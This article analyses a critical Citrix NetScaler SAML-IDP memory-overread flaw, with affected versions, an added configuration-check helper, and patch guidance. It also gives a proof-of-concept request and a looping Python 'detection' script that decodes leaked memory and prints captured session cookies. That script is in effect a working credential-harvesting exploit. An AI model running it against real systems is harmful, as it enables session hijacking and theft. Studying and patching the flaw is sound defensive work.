Critical Citrix NetScaler CVE‑2026‑3055: Exploit Details, Detection Script, and Patch Guidance
The article analyzes the critical CVE‑2026‑3055 Citrix NetScaler memory‑overread flaw, explains its SAML‑IDP trigger, shows real‑world exploitation, provides a Python detection script with usage steps, and recommends immediate patching of affected ADC/Gateway versions.
Vulnerability overview
CVE‑2026‑3055 (CVSS 9.3) is a memory‑overread (CWE‑125) bug in Citrix NetScaler ADC/Gateway that manifests only when the appliance is configured as a SAML Identity Provider (SAML IDP). The flaw allows an unauthenticated remote attacker to read residual memory, potentially exposing session tokens, admin session IDs, and other sensitive data.
Affected versions
NetScaler ADC/Gateway 14.1 earlier than 14.1‑60.58 (fixed in 14.1‑66.59 and later)
NetScaler ADC/Gateway 13.1 earlier than 13.1‑62.23
NetScaler ADC FIPS / NDcPP earlier than 13.1‑37.262
Impact
When the vulnerable endpoint processes a crafted request, it reads uninitialized memory and returns the data Base64‑encoded in the NSC_TASS cookie. The leaked memory can contain previous HTTP request headers, internal cookies, and administrator session identifiers.
Detection
Search the NetScaler configuration for the string add authentication samlIdPProfile. Presence of this command strongly indicates the device is configured as a SAML IDP and therefore vulnerable.
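To make the affected-version list above and this configuration check repeatable across a fleet, here is an added Python helper (written for this edit, not code from the article or from Citrix) that reads a saved NetScaler configuration plus a build string and reports whether the appliance is in the exposed state. The fixed-build thresholds are the ones quoted in this article; the sample configuration excerpt is constructed and its names are placeholders.

```python
import re

# Fixed builds as quoted in this article. FIPS/NDcPP builds share the 13.1
# prefix, so the caller must say which build line the appliance runs.
FIXED_BUILDS = {
    "14.1": "14.1-66.59",
    "13.1": "13.1-62.23",
    "13.1-FIPS": "13.1-37.262",
}

# Constructed ns.conf excerpt; profile and certificate names are placeholders.
SAMPLE_NS_CONF = """\
set ns config -IPAddress 192.0.2.5 -netmask 255.255.255.0
add authentication samlIdPProfile idp_prof -samlIdPCertName idpcert -samlSPCertName spcert
add authentication vserver auth_vs SSL 192.0.2.6 443
"""

def parse_build(version):
    """'14.1-66.59' -> (14, 1, 66, 59) so builds compare numerically, not as strings."""
    m = re.fullmatch(r"(\d+)\.(\d+)-(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised NetScaler build string: {version!r}")
    return tuple(int(x) for x in m.groups())

def build_is_fixed(version, fips=False):
    """True/False against the fixed build for this line; None if the line is not listed."""
    major_minor = version.strip().split("-")[0]
    key = f"{major_minor}-FIPS" if fips else major_minor
    if key not in FIXED_BUILDS:
        return None
    return parse_build(version) >= parse_build(FIXED_BUILDS[key])

def saml_idp_configured(ns_conf):
    """The configuration check from the article: is a samlIdPProfile defined?"""
    pattern = re.compile(r"^\s*add\s+authentication\s+samlIdPProfile\b", re.I | re.M)
    return pattern.search(ns_conf) is not None

def assess(version, ns_conf, fips=False):
    """Combine both conditions: the bug only matters when SAML IDP is configured."""
    if not saml_idp_configured(ns_conf):
        return "not exposed: no SAML IDP profile configured"
    fixed = build_is_fixed(version, fips)
    if fixed is None:
        return "unknown: build line not covered by the article"
    if fixed:
        return "not exposed: SAML IDP configured but build is patched"
    return "EXPOSED: SAML IDP configured on an unpatched build"

if __name__ == "__main__":
    print(assess("14.1-60.58", SAMPLE_NS_CONF))
```

Run it against the output of `show ns runningConfig` (or a saved ns.conf) and the build reported by `show ns version`; pass fips=True for FIPS/NDcPP appliances, since their fixed build differs from standard 13.1.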
Exploitation mechanics
The overread is triggered by the wctx query parameter. The appliance checks only for the parameter’s existence; it does not verify that a value or an ‘=’ sign follows, causing it to read dead memory.
Leaked data is delivered via the response header Set‑Cookie: NSC_TASS=…, where the value is a Base64‑encoded memory dump.
Minimal proof‑of‑concept request (for detection only):
GET /wsfed/passive?wctx HTTP/1.1
When sent to /saml/login or /wsfed/passive, a vulnerable device responds with a 302 redirect and an NSC_TASS cookie containing Base64‑encoded memory. Repeating the request yields different memory blocks. Patched devices no longer include such data.
Detection script (Python)
import base64
import requests
import urllib3

# Appliances commonly present self-signed certificates; silence the TLS warnings.
urllib3.disable_warnings()

# Each request returns a different residual-memory block, so the script loops.
while True:
    try:
        resp = requests.get(
            "https://<your-target-IP-or-domain>/wsfed/passive?wctx",
            verify=False,
            allow_redirects=False,  # the 302 itself carries the NSC_TASS cookie
        )
        tass = resp.cookies.get('NSC_TASS', None)
        if tass is None:
            continue
        # The cookie value is Base64-encoded memory; decode it before inspection.
        tassText = base64.b64decode(tass)
        memIdx = tassText.find(b'wctx=')
        if memIdx != -1:
            bled = tassText[memIdx + 5:]
            cookiePos = bled.find(b'Cookie')
            if cookiePos != -1:
                print(bled[cookiePos:].decode('ascii', errors='ignore'))
    except Exception:
        pass
Usage steps
Replace <your-target-IP-or-domain> with the NetScaler VIP you want to test.
Execute the script only on systems you are authorized to test.
If the decoded output contains strings such as "Cookie", "Header", or session identifiers, the appliance is leaking memory and is vulnerable.
Mitigation
Upgrade to the fixed builds listed above. Citrix cloud‑hosted instances receive the update automatically. The official Citrix security bulletin (article CTX696300) provides the patch download links and configuration‑check commands.